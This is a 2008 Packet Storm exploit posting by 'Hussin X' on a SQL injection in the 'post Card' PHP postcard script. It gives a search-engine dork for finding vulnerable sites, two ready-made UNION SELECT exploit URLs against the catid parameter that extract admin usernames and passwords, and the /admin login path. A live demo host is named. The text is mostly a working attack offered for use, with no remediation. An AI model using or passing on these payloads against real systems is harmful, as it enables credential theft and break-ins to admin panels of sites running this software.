postcard-sql.txt

2008-11-04T00:00:00
ID PACKETSTORM:71537
Type packetstorm
Reporter Hussin X
Modified 2008-11-04T00:00:00

Description

                                        
                                            `post Card ( catid ) Remote SQL Injection Vulnerability  
___________________________________  
  
Author: Hussin X  
  
Home : www.IQ-TY.com & www.TrYaG.cc  
  
MaiL : darkangeL_G85@Yahoo.CoM  
___________________________________  
  
script : http://webbdomain.com/php/postcarden/index2.php  
script : http://webbdomain.com/php/postcardir/index2.php  
  
DorK : inurl:choosecard.php?catid=  
_____  
  
ExploiT & Demo  
_______  
  
post Card v 1.01  
  
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--  
  
  
post Card v 1.02  
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--  
  
  
Note : Exploit in Properties Picture  
  
  
Login :  
______  
/admin  
  
  
  
  
Greetz : All my freind  
  
  
Im IraQi | Im TrYaGi  
  
`